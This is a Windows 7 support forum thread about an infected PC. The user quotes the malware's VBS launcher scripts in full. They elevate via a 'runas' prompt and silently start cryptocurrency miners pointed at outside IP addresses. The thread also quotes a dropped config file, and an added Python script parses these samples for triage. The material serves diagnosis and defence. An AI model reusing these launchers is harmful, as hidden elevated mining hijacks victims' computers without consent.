Potential virus, then no internet connection

Discussion in 'Windows 7 Help and Support' started by RobSin, Nov 6, 2013.

  1. RobSin

    RobSin Well-Known Member

    Joined:
    Feb 8, 2010
    Messages:
    8
    Likes Received:
    0
    The machine in question is a Dell 8300, core i7 chip, running Windows-7x64 and had Norton Internet Security on it.
    My internet IS working in my house. I have a number of wired and wireless connections, all working. 1 computer had an issue with an .exe that was taking about 50 % of CPU cycles. The problem executable was:
    C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVClp.exe
    There was also another .txt file in that folder called: x5r7TQa.txt
    The contents of the text file are:
    add:193.107.16.57
    dum:AKDTDDtx7krDmrtgSq4A7Lv3V8iqvw9cdY
    por:2657
    ver:6
    gen:4
    don:5
    There are also 2 .vbs files in the folder:
    srsx.vbs which contains the following:
    If WScript.Arguments.length = 0 Then
    Set objShell = CreateObject("Shell.Application")
    objShell.ShellExecute "wscript.exe", Chr(34) & _
    WScript.ScriptFullName & Chr(34) & " Microsoft Server Runtime ", "", "runas", 1
    WScript.Quit
    Else
    Set objSh = CreateObject("Wscript.Shell")
    objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\srsx.exe -o http://194.63.141.76:10034 -u mumus575.xpm_16 -p x", 0
    End If
    and xRAVCp.vbs which contains:
    Set objSh = CreateObject("Wscript.Shell")
    objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVCp.exe -pooluser=AQXUSoBLto8s85nQJdFDC4yUqaCzbjKp8b -poolip=194.63.141.76 -poolport=1337 -genproclimit=4 -poolfee=2", 0

    So clearly, these are related to the problem .exe file. Also of note, all of my other Win7x64 machines have 0 files in folder C:\Users\Whoever\AppData\Roaming\Microsoft\Crypto\
    and only an RSA folder in there. I have uploaded 2 .jpgs showing the filenames in the folder before and currently.
    If we killed the running app in Task Manager, everything is fine. Upon reboot, the file gets run again (after a couple of minutes) and the CPU usage goes WAY UP. So we killed the 2 files from the file system and rebooted. They get re-created and same problem occurs.
    So we called NORTON and they remote in and right after she asks if she can delete those files, I say yes, but they come back after reboot. The system gets rebooted (I THINK by her) and when we reboot, we have no internet connection. Actually, Windows THINKS it's connected (and I can ping) but IE cannot display any web page. I get on a second (identical) machine and connect back to Norton in the chat window and we end up removing ALL of Norton Internet Security, but still no luck. Interestingly enough, Windows prompts me (on the 'bad' machine) to load Windows Defender for some protection. Windows Defender WAS able to get out and get files and install. Finally, thinking it's my browser that has been hosed, I download the FULL install of Chrome on the 2nd machine, bring it over, and it seems to load but immediately tries to connect to the internet and fails.

    So, I'd like to get the internet up first, as we can't do much of anything on this machine without it.
    Current status of the machine:
    1. When we reboot, we get a message "THXAudio has stopped working" (and Windows searches for a bit for a solution, then closes the window).
    2. We get a number of beeps (2 or 3??) similar to what you get when you remove a USB thumb drive.
    3. We have no connectivity through IE or any other program (i.e., Steam) that accesses the internet, although Windows defender seemed to get files.
    4. The CPU hog program is still on the file system, but does not seem to be running anymore.
    I am going to appeal to the Sherlock Holmes types out there and hope you can help me solve this mystery.
    I'd REALLY appreciate it. (If nothing else, just telling me what the vbscript files are doing would be great).
    Thanks,
    Rob
     

    Attached Files:
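    To answer the "what are the vbscript files doing" question from a triage standpoint: srsx.vbs first relaunches itself through Shell.Application.ShellExecute with the "runas" verb (which is what triggers a UAC elevation prompt), and on the elevated second run starts srsx.exe with a hidden window (the trailing 0) pointed at a host:port with a username and password; xRAVCp.vbs just starts xRAVCp.exe hidden with -poolip/-poolport/-pooluser/-genproclimit switches, the command-line shape of a pool-mining client. The Python below is an added example, not anything from the thread or from Norton: it parses the script bodies, the .txt config and the folder listing exactly as quoted in the post (embedded here as constructed samples) and pulls out the launched binaries, the elevation and hidden-window behaviour, and the host:port endpoints, so the same check can be run offline against a copy of the folder.

```python
import re

# Constructed samples: the launcher scripts, config file and folder listing quoted in the post.
SRSX_VBS = r'''If WScript.Arguments.length = 0 Then
Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute "wscript.exe", Chr(34) & _
WScript.ScriptFullName & Chr(34) & " Microsoft Server Runtime ", "", "runas", 1
WScript.Quit
Else
Set objSh = CreateObject("Wscript.Shell")
objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\srsx.exe -o http://194.63.141.76:10034 -u mumus575.xpm_16 -p x", 0
End If'''
XRAV_VBS = r'''Set objSh = CreateObject("Wscript.Shell")
objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVCp.exe -pooluser=AQXUSoBLto8s85nQJdFDC4yUqaCzbjKp8b -poolip=194.63.141.76 -poolport=1337 -genproclimit=4 -poolfee=2", 0'''
CONFIG_TXT = "add:193.107.16.57\ndum:AKDTDDtx7krDmrtgSq4A7Lv3V8iqvw9cdY\npor:2657\nver:6\ngen:4\ndon:5"
CRYPTO_DIR = ["RSA", "xRAVClp.exe", "xRAVCp.exe", "xRAVCp.vbs", "srsx.exe", "srsx.vbs", "x5r7TQa.txt"]

RUN_RE = re.compile(r'\.Run\s+"([^"]+)"\s*,\s*(\d+)')             # WScript.Shell.Run "<cmd>", <windowstyle>
URL_RE = re.compile(r'https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)')  # -o http://ip:port
POOL_RE = re.compile(r'-poolip=(\S+).*?-poolport=(\d+)')          # -poolip=ip ... -poolport=port

def triage_vbs(text):
    """Summarise a dropped .vbs launcher: does it relaunch itself elevated
    (ShellExecute ... "runas"), which binary does it start, is the window
    hidden (style 0), and which host:port is that binary told to contact."""
    report = {"elevates": "ShellExecute" in text and '"runas"' in text,
              "hidden": False, "exe": None, "args": "", "endpoints": set()}
    for cmd, style in RUN_RE.findall(text):
        exe, _, args = cmd.partition(" ")
        report.update(exe=exe, args=args, hidden=(style == "0"))
        for pat in (URL_RE, POOL_RE):
            for ip, port in pat.findall(args):
                report["endpoints"].add((ip, int(port)))
    return report

def parse_config(text):
    """Parse the key:value lines of the dropped .txt (add = host, por = port, ...)."""
    return dict(line.strip().split(":", 1) for line in text.splitlines() if ":" in line)

def unexpected_entries(listing):
    """A clean Win7 profile has only the RSA folder under the Crypto directory in AppData."""
    return [name for name in listing if name.upper() != "RSA"]

if __name__ == "__main__":
    for name, body in (("srsx.vbs", SRSX_VBS), ("xRAVCp.vbs", XRAV_VBS)):
        print(name, triage_vbs(body))
    print("config:", parse_config(CONFIG_TXT))
    print("unexpected in Crypto folder:", unexpected_entries(CRYPTO_DIR))
```

The endpoints and the config's add/por values are what to look for in the router or firewall logs while the machine is still "connected but no web pages", and the hidden-window Run plus the runas relaunch are what to block when hunting for the re-creation mechanism on reboot.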

  2. RobSin

    RobSin Well-Known Member

    Joined:
    Feb 8, 2010
    Messages:
    8
    Likes Received:
    0
    One other item. Early on, I ran Microsoft Malicious tool thingy, and Norton "file reputation" scan on the folder in question, and neither one identified any "bad files." Also ran Norton "NPE.exe" on the folder and it recommended to remove the exe's listed in file listing 1 but not in file listing 2. Did this while we were still trying to figure out the virus/malware thing. After doing that we still had internet connection. I also noticed that the .exe was somehow connected (spawned by???) JAVA so we removed 2 copies of JAVA 6 and 1 of Java 7, thinking we could just reinstall after fixing the CPU hog program. After doing this, we still had internet.
    Another question: JAVAW.exe is still running in task manager. How can that be, if we have uninstalled the JAVA stuff via "uninstall"?
     
  3. Pauli

    Pauli Extraordinary Member
    Premium Supporter

    Joined:
    Mar 1, 2012
    Messages:
    2,499
    Likes Received:
    211
    I'd start with uninstalling CPU hog, run CCleaner, reboot and set BIOS to default values.

    Then I would disable THXAudio, and set the sounds to stereo, or mono, or disable them totally, and reboot.

    Then, adding to previous, and not changing them, I would disable all security programs and get them off autostart so they won't automatically start with Windows, and reboot.

    If it still wouldn't work, I'd use a restore / recovery point. The .vbs files are Visual Basic; any problems with them may have to do with permission = you need to be administrator.

    And now I'm getting tired... hope you get it running. :scratch:
     
    #3 Pauli, Nov 8, 2013
    Last edited: Nov 8, 2013
